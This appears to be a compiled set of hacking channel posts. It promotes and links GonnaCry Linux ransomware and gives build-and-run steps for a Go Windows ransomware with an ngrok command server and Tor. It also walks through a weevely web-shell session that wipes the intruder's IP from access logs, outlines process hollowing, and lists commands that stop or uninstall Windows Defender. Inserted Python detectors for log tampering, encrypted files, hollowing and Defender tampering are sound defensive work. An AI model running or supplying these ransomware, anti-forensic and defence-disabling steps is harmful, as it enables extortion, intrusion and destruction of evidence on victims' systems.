Ransomware impact on industry 2020:
https://medium.com/@tarcisioma/how-can-a-malware-encrypt-a-company-existence-c7ed584f66b3
How this ransomware encryption scheme works:
https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9
How this ransomware works:
https://0x00sec.org/t/how-ransomware-works-and-gonnacry-linux-ransomware/4594
https://medium.com/@tarcisioma/how-ransomware-works-and-gonnacry-linux-ransomware-17f77a549114
Mentions:
https://www.sentinelone.com/blog/sentinelone-detects-prevents-wsl-abuse/
https://hackingvision.com/2017/07/18/gonnacry-linux-ransomware/
Medium: How can a malware encrypt a company existence?
More than 4,000 ransomware attacks occur daily, according to the FBI.
2020 Linux ransomware:
FEATURES:
Encrypts all user files with AES-256-CBC.
Random AES key and IV for each file.
Works even without an internet connection.
Communicates with the server to decrypt the client private key.
Encrypts the AES key with the client public key (RSA-2048).
Encrypts the client private key with the server public key (RSA-2048).
Changes the computer wallpaper (Gnome, LXDE, KDE, XFCE).
Decryptor that communicates with the server to send keys.
Python web server
Daemon
Dropper
Kills databases
DOWNLOAD:
https://github.com/tarcisio-marinho/GonnaCry
How to clean an IP address from logs
instagram.com/UndercoDETESTING
This tutorial shows how to clean up access traces from the logs on a server which does not allow shell command execution, provided that the target log file is writable by the user running our agent backdoor.
Configuration
Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
Used modules: file_grep (grep), system_info, file_rm (rm), file_cp (cp)
Session
In the example shared hosting server configuration, the HTTP access log file of the user's virtual host is kept in the ~/logs/ folder.
$ ./weevely.py http://target/agent.php mypassword
[+] weevely 3.0
[+] Target: target
[+] Session: _weevely/sessions/target/agent_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> ls
.
..
htdocs
logs
cpanel
.profile
cgi-bin
member@target:/home/member PHP> cd logs
member@target:/home/member/logs PHP> ls
.
..
access.log
member@target:/home/member/logs PHP>
Now run the system_info command to find out the IP address our connection came from.
member@target:/home/member/logs PHP> :system_info -info client_ip
174.122.136.104
member@target:/home/member/logs PHP>
Now run the grep command (an alias for the file_grep module) to find out if our IP address has been logged in the log file.
member@target:/home/member/logs PHP> grep access.log 174.122.136.104
174.122.136.104 - - [21/Apr/2015:20:37:04 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.co.uz/url?sa=t&rct=j&source=web&cd=136&ved=d7fQaxNTP&ei=qpG-lx-Uque6l97bG_EZfE&usg=FL237uTSYjAc8DC-d971rS4UUPyWV13nyK" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3"
174.122.136.104 - - [21/Apr/2015:20:34:01 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://translate.googleusercontent.com/translate_c?depth=1&rurl=translate.google.com&sl=auto&tl=en&usg=200QawVTBiv_BPoQJdoQhA-yTa66mtGaEA" "Opera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR)"
174.122.136.104 - - [21/Apr/2015:20:28:24 +0100] "GET /agent.php HTTP/1.1" 200 443 "http://www.google.com.uy/url?sa=t&rct=j&source=web&cd=183&ved=DJY1U23wu&ei=GfRq0HsncZ7nn32louwyv0&usg=oYydfzk5nYywMujSFCTAmFvz3i3U7IYMDW" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729)"
We can see that the activities from our IP address have been logged. We can run grep again with the -v option to remove our IP from the log, saving the result to a temporary file.
member@target:/home/member/logs PHP> grep access.log -v 174.122.136.104 -output cleaned.log
member@target:/home/member/logs PHP>
Let's test whether our IP has actually been removed:
member@target:/home/member/logs PHP> grep cleaned.log 174.122.136.104
member@target:/home/member/logs PHP>
Now we can replace the real access.log with cleaned.log.
member@target:/home/member/logs PHP> rm access.log
member@target:/home/member/logs PHP> cp cleaned.log access.log
member@target:/home/member/logs PHP> rm cleaned.log
Our tracks are now removed from the target log file.
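Seen from the defender's side, the rewrite in this session is detectable because an append-only access log should never shrink or change bytes that were already written. The following Python example is added here and is not part of the original post; the checkpoint scheme, the function names and the sample entries (documentation IP ranges) are assumptions constructed for illustration.

```python
import hashlib
import os
import shutil
import tempfile
from collections import namedtuple

# inode, number of bytes covered, SHA-256 of those bytes
Checkpoint = namedtuple("Checkpoint", "inode offset prefix_sha256")


def prefix_digest(path, length):
    """SHA-256 of the first `length` bytes of `path`, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        while length > 0:
            chunk = fh.read(min(65536, length))
            if not chunk:
                break
            h.update(chunk)
            length -= len(chunk)
    return h.hexdigest()


def take_checkpoint(path):
    st = os.stat(path)
    return Checkpoint(st.st_ino, st.st_size, prefix_digest(path, st.st_size))


def verify(path, cp):
    """Compare the log with an earlier checkpoint of itself."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return "missing"
    if st.st_size < cp.offset:
        return "truncated"   # an append-only log never shrinks
    if prefix_digest(path, cp.offset) != cp.prefix_sha256:
        return "rewritten"   # bytes that were already logged have changed
    if st.st_ino != cp.inode:
        return "replaced"    # same content, but a different file object
    return "ok"


def append(path, lines):
    with open(path, "a") as fh:
        fh.writelines(line + "\n" for line in lines)


def demo():
    # Constructed sample entries; all addresses are documentation ranges.
    entry = '{ip} - - [21/Apr/2015:20:{m}:00 +0100] "GET /{p} HTTP/1.1" 200 443'
    workdir = tempfile.mkdtemp()
    log = os.path.join(workdir, "access.log")
    results = {}
    try:
        append(log, [entry.format(ip="198.51.100.7", m="10", p="index.html"),
                     entry.format(ip="192.0.2.10", m="28", p="agent.php"),
                     entry.format(ip="198.51.100.7", m="30", p="about.html"),
                     entry.format(ip="192.0.2.10", m="34", p="agent.php")])
        cp = take_checkpoint(log)

        append(log, [entry.format(ip="198.51.100.9", m="40", p="index.html")])
        results["normal_append"] = verify(log, cp)
        cp = take_checkpoint(log)

        # Same effect as the session above: one client filtered out, file swapped in.
        with open(log) as fh:
            kept = [line for line in fh if not line.startswith("192.0.2.10 ")]
        cleaned = os.path.join(workdir, "cleaned.log")
        with open(cleaned, "w") as fh:
            fh.writelines(kept)
        os.remove(log)
        shutil.copy(cleaned, log)
        results["after_filtering"] = verify(log, cp)

        # The server keeps logging, so the file grows past the old offset again.
        append(log, [entry.format(ip="198.51.100.9", m=str(41 + i), p="index.html")
                     for i in range(5)])
        results["filtered_then_grown"] = verify(log, cp)
    finally:
        shutil.rmtree(workdir)
    return results


if __name__ == "__main__":
    print(demo())
```

A checkpoint only proves tampering if it is stored where the web user cannot write; forwarding entries to a remote collector as they are written also preserves the lines that were removed.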
GOOD RANSOMWARE FOR WINDOWS
> A POC Windows crypto-ransomware (Academic)
t.me/UndercodeTesting
WHAT IS RANSOMWARE?
Ransomware is a type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files unless a ransom is paid. More modern ransomware families, collectively categorized as crypto-ransomware, encrypt certain file types on infected systems and force users to pay the ransom through certain online payment methods to get a decryption key.
FEATURES:
Run in background (or not).
Encrypts files using AES-256-CTR (Counter Mode) with a random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an unlocker.
Optional Tor proxy support.
Uses an AES-CTR cipher with stream encryption to avoid loading an entire file into memory.
Walks all drives by default.
Docker image for compilation.
INSTALLATION & RUN:
First of all, download the project outside your $GOPATH:
git clone github.com/mauri870/ransomware
cd ransomware
If you have Docker skip to the next section.
You need Go 1.11.2 or later, with $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:
export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Building the project requires a lot of steps, such as RSA key generation, building three binaries and embedding manifest files, so let make do the job:
make deps
make
You can build the server for Windows with make -e GOOS=windows.
Docker
./build-docker.sh make
Config Parameters
You can change some of the configs during compilation. Instead of running only make, you can use the following variables:
HIDDEN='-H windowsgui' # optional. If present the malware will run in background
USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server
SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware
SERVER_PORT=8080 # the server port, if using a domain you can set this to 80
GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
@uNDERCODETesting
TUTORIAL: HOW TO RUN THE RANSOMWARE ON WINDOWS
1) First of all, let's start our external domain:
ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.
2) Let's compile the binaries (remember to replace the domain):
make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.
3) After the build, binaries called ransomware.exe and unlocker.exe, along with a folder called server, will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a different GOOS variable during compilation) is locked to Windows machines only.
4) Enter the server directory from another terminal and start it:
cd bin/server && ./server --port 8080
To make sure that all is working correctly, make an HTTP request to http://2af7161c.ngrok.io:
curl http://2af7161c.ngrok.io
5) If you see an OK and some logs in the server output you are ready to go.
Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.
6) Then simply run ransomware.exe and see the magic happen.
The window that you see can be hidden using the HIDDEN option described in the compilation section.
7) After downloading, extracting and starting the Tor proxy, the malware waits until the Tor bootstrapping is done and then proceeds with the key exchange with the server. The client/server handshake takes place and the client payload, encrypted with an RSA-4096 public key, must be correctly decrypted on the server. The victim identification and encryption keys are stored in a Golang embedded database called BoltDB (it also persists on disk). When completed we get into the find, match and encrypt phase: up to N-cores workers start to encrypt files matched by the patterns defined. This process is really quick and in seconds all of your files will be gone.
8) The encryption key exchanged with the server was used to encrypt all of your files. Each file has a random primitive called an IV, generated individually and saved as the first 16 bytes of the encrypted content. The algorithm used is AES-256-CTR, a good AES cipher with a streaming mode of operation such that the file size is left intact.
9) The only two sources of information available about what just happened are the READ_TO_DECRYPT.html and FILES_ENCRYPTED.html in the Desktop.
10) In theory, to decrypt your files you need to send an amount of BTC to the attacker's wallet, followed by a contact sending your ID (located in the file created on the desktop). If the attacker can confirm your payment it will possibly (or maybe not) return your encryption key and the unlocker.exe, and you can use them to recover your files. This exchange can be accomplished in several ways and WILL NOT be implemented in this project for obvious reasons.
11) Let's suppose you get your encryption key back. To recover the correct key point to the following url:
curl -k http://2af7161c.ngrok.io/api/keys/:id
12) Where :id is your identification stored in the file on the desktop. Afterwards, run the unlocker.exe by double click and follow the instructions.
That's it, got your files back :)
The server has only two endpoints:
POST api/keys/add - Used by the malware to persist new keys. Some verifications are made, like the verification of the RSA authenticity. Returns 204 (empty content) in case of success or a JSON error.
GET api/keys/:id - Id is a 32-character parameter, representing an Id already persisted. Returns a JSON document containing the encryption key or a JSON error.
@uNDERCODETesting
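For incident triage, the file layout described above (a 16-byte IV prefix followed by a body that AES-256-CTR leaves at its original length) gives two checkable signals: a file that is exactly 16 bytes larger than its backup copy and whose body has near-maximal entropy. The following Python example is added here and is not code from the project; the manifest format, function names and sample data are assumptions constructed for illustration, and the "encrypted" sample is deterministic filler, not real ciphertext.

```python
import hashlib
import math
from collections import Counter

IV_LEN = 16  # the post states the IV is saved as the first 16 bytes


def shannon_entropy(data):
    """Bits per byte; close to 8.0 for ciphertext or compressed data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(baseline, current, min_entropy=7.5):
    """baseline: {path: (size, sha256 hex)} taken from a backup manifest.
    current:  {path: bytes} as read from the affected host."""
    verdicts = {}
    for path, (size, digest) in baseline.items():
        data = current.get(path)
        if data is None:
            verdicts[path] = "missing"
        elif hashlib.sha256(data).hexdigest() == digest:
            verdicts[path] = "unchanged"
        elif (len(data) == size + IV_LEN
              and shannon_entropy(data[IV_LEN:]) >= min_entropy):
            verdicts[path] = "likely-encrypted"
        else:
            verdicts[path] = "modified"
    return verdicts


def filler(n, seed):
    """Deterministic high-entropy bytes standing in for ciphertext or
    compressed data. Nothing is encrypted here."""
    out = bytearray()
    i = 0
    while len(out) < n:
        out += hashlib.sha256(f"{seed}:{i}".encode()).digest()
        i += 1
    return bytes(out[:n])


def manifest(files):
    return {p: (len(d), hashlib.sha256(d).hexdigest()) for p, d in files.items()}


def demo():
    # Constructed sample data.
    text = b"2020-04-01;invoice;42.00;EUR\n" * 400
    before = {
        "docs/report.csv": text,
        "docs/notes.txt": b"meeting notes\n" * 300,
        "img/photo.jpg": filler(6000, "jpg"),       # high entropy even when clean
        "backup/archive.zip": filler(9000, "zip"),
        "db/old.sqlite": b"\x00" * 2048,
    }
    after = {
        "docs/report.csv": filler(IV_LEN + len(text), "enc"),  # IV + same-length body
        "docs/notes.txt": before["docs/notes.txt"] + b"one more line\n",
        "img/photo.jpg": before["img/photo.jpg"],
        "backup/archive.zip": filler(9500, "zip2"),            # legitimately rebuilt
    }
    return triage(manifest(before), after)


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{verdict:17} {path}")
```

Entropy alone would also flag the JPEG and ZIP samples, which is why the size delta against the manifest is checked first.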
Process hollowing: Hiding code in legitimate processes
> Process hollowing is a code injection technique that involves spawning a new instance of a legitimate process and then "hollowing it out", i.e., replacing the legitimate code with malware.
> Unlike most injection techniques that add a malicious feature to an otherwise normally running process, the result of hollowing is a process that looks legitimate on the outside but is primarily malicious on the inside.
t.me/UndercodeTesting
LET'S START:
While there are a few known techniques that achieve process hollowing, the most common variant typically follows four steps to achieve stealthy execution of malicious code:
1) The malware spawns a new instance of a legitimate process (e.g., explorer.exe, lsass.exe, etc.), and places it in a suspended state.
2) The malware then hollows out the memory section in the new (and still suspended) process that holds the base address of the legitimate code. To do this, the malware uses the NtUnmapViewOfSection routine.
3) It allocates read-write-execute (RWX) memory in the suspended process to prepare for the replacement malicious code. The malware then copies malicious code into the allocated memory. It changes the target address of the first thread to the malicious program's entry point.
4) When the thread resumes, the malicious code starts running, now disguised as a legitimate process. The malware is then free to delete remnants of itself from disk to avoid detection.
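Because the steps above must happen in a fixed order between process creation and thread resume, the sequence itself is a detection signal. The following Python example is added here and is not part of the original post; the event schema and action names (create_suspended, unmap_image, alloc_memory, write_memory, set_thread_entry, resume_thread) are hypothetical normalized telemetry fields, and the sample events are constructed.

```python
# Hypothetical normalized event names for the steps described above.
FULL_CHAIN = ["unmap_image", "alloc_rwx", "write_memory", "set_thread_entry"]
PARTIAL_CHAIN = ["write_memory", "set_thread_entry"]


def in_order(needle, haystack):
    """True if `needle` occurs in `haystack` as an ordered subsequence."""
    it = iter(haystack)
    return all(step in it for step in needle)


def normalize(ev):
    """Split memory allocations by protection so only RWX counts for the chain."""
    if ev["action"] == "alloc_memory":
        return "alloc_rwx" if ev.get("prot") == "RWX" else "alloc_other"
    return ev["action"]


def detect(events):
    """Return [(actor_pid, target_pid, image, verdict)] in order of thread resume.

    Only what a creator does to its own suspended child is tracked; a child
    that is resumed without being modified produces no alert.
    """
    pending = {}   # (actor, target) -> {"image": str, "steps": [str]}
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["actor"], ev["target"])
        action = normalize(ev)
        if action == "create_suspended":
            pending[key] = {"image": ev["image"], "steps": []}
        elif key in pending and action == "resume_thread":
            state = pending.pop(key)
            if in_order(FULL_CHAIN, state["steps"]):
                alerts.append(key + (state["image"], "hollowing"))
            elif in_order(PARTIAL_CHAIN, state["steps"]):
                # Assumption: a remote write plus an entry-point change is
                # worth review even when no unmap or RWX allocation was seen.
                alerts.append(key + (state["image"], "suspicious"))
        elif key in pending:
            pending[key]["steps"].append(action)
    return alerts


def ev(ts, actor, target, action, **extra):
    return dict(ts=ts, actor=actor, target=target, action=action, **extra)


SAMPLE = [  # constructed telemetry, interleaved across three parent processes
    ev(1, 4120, 5200, "create_suspended", image="explorer.exe"),
    ev(2, 3000, 5300, "create_suspended", image="notepad.exe"),
    ev(3, 4120, 5200, "unmap_image"),
    ev(4, 3000, 5300, "resume_thread"),          # benign: nothing modified
    ev(5, 4120, 5200, "alloc_memory", prot="RWX"),
    ev(6, 6000, 6100, "create_suspended", image="calc.exe"),
    ev(7, 4120, 5200, "write_memory"),
    ev(8, 6000, 6100, "alloc_memory", prot="RW"),
    ev(9, 6000, 6100, "write_memory"),
    ev(10, 4120, 5200, "set_thread_entry"),
    ev(11, 6000, 6100, "set_thread_entry"),
    ev(12, 4120, 5200, "resume_thread"),
    ev(13, 6000, 6100, "resume_thread"),
    ev(14, 7000, 7100, "write_memory"),          # no suspended create seen: ignored
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```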
DISABLE WINDOWS DEFENDER USING CMD:
instagram.com/UndercodeTesting
Using Command Prompt
1) Open Command Prompt with administrative privileges.
2) Run the following command to disable Windows Defender:
sc stop WinDefend
3) To enable Windows Defender again, run the following command:
sc start WinDefend
4) Please note that this is a temporary method to stop Windows Defender. The service will return to its original state when the system is restarted. To disable Windows Defender permanently using Command Prompt, run the following commands:
sc config WinDefend start= disabled
sc stop WinDefend
5) To enable it again on startup, run the following commands:
sc config WinDefend start= auto
sc start WinDefend
6) If you want to check the current state of the Windows Defender service, run the following command:
sc query WinDefend
Check the STATE variable. It should be in RUNNING state if it is enabled.
Using PowerShell
One advantage of PowerShell is that you can deploy changes to Windows Defender on multiple computers over the network.
If you prefer the PowerShell way, follow the steps below:
1) Run PowerShell with administrative privileges (Windows key + X + A).
2) To disable real-time monitoring of Windows Defender, run the following command:
Set-MpPreference -DisableRealtimeMonitoring $true
3) To enable real-time monitoring, run the following command:
Set-MpPreference -DisableRealtimeMonitoring $false
4) The above method will only turn off real-time monitoring of Windows Defender. If you want to completely remove Windows Defender from Windows 10, use the following PowerShell command:
Uninstall-WindowsFeature -Name Windows-Defender
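Each command in this post leaves a process command line that endpoint logging can match, and the re-enable and query forms must not trigger the same alert. The following Python example is added here and is not part of the original post; the log line layout (timestamp, host=, user=, cmd=), the rule names and the sample lines are assumptions constructed for illustration.

```python
import re

# One rule per tamper command shown above; matched against a lowercased command line.
RULES = [
    ("service_stop",
     r"\bsc(?:\.exe)?\s+stop\s+windefend\b"),
    ("service_disabled",
     r"\bsc(?:\.exe)?\s+config\s+windefend\s+start=\s*disabled\b"),
    ("realtime_monitoring_off",
     r"\bset-mppreference\b.*-disablerealtimemonitoring[\s:]+(?:\$true|1)\b"),
    ("feature_removed",
     r"\buninstall-windowsfeature\b.*\bwindows-defender\b"),
]
COMPILED = [(name, re.compile(rx)) for name, rx in RULES]

# Assumed layout of a process-creation record exported as text.
LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")


def detect(lines):
    """Return [(host, user, rule_name)] for every tamper command found."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a process-creation record in the assumed layout
        cmd = m["cmd"].lower()
        for name, rx in COMPILED:
            if rx.search(cmd):
                hits.append((m["host"], m["user"], name))
    return hits


def persistently_disabled(hits):
    """Hosts where the service was both stopped and set to 'disabled',
    i.e. the change the post says survives a restart."""
    by_host = {}
    for host, _user, rule in hits:
        by_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in by_host.items()
                  if {"service_stop", "service_disabled"} <= rules)


SAMPLE = [  # constructed log lines
    "2020-05-01T10:00:01Z host=WS01 user=alice cmd=sc stop WinDefend",
    "2020-05-01T10:00:05Z host=WS01 user=alice "
    "cmd=C:\\Windows\\System32\\sc.exe  config WinDefend start= disabled",
    "2020-05-01T10:02:00Z host=WS01 user=alice cmd=sc query WinDefend",
    "2020-05-01T10:05:00Z host=WS02 user=bob "
    "cmd=powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true",
    "2020-05-01T10:06:00Z host=WS02 user=bob "
    "cmd=powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $false",
    "2020-05-01T10:09:00Z host=SRV01 user=svc_admin "
    "cmd=powershell.exe Uninstall-WindowsFeature -Name Windows-Defender",
    "2020-05-01T10:10:00Z host=WS01 user=alice cmd=sc start WinDefend",
    "malformed line without fields",
]

if __name__ == "__main__":
    found = detect(SAMPLE)
    for hit in found:
        print(hit)
    print("persistently disabled:", persistently_disabled(found))
```

Command-line matching misses changes made through other interfaces; Defender's own operational log records real-time protection being turned off (event ID 5001) regardless of how it was done.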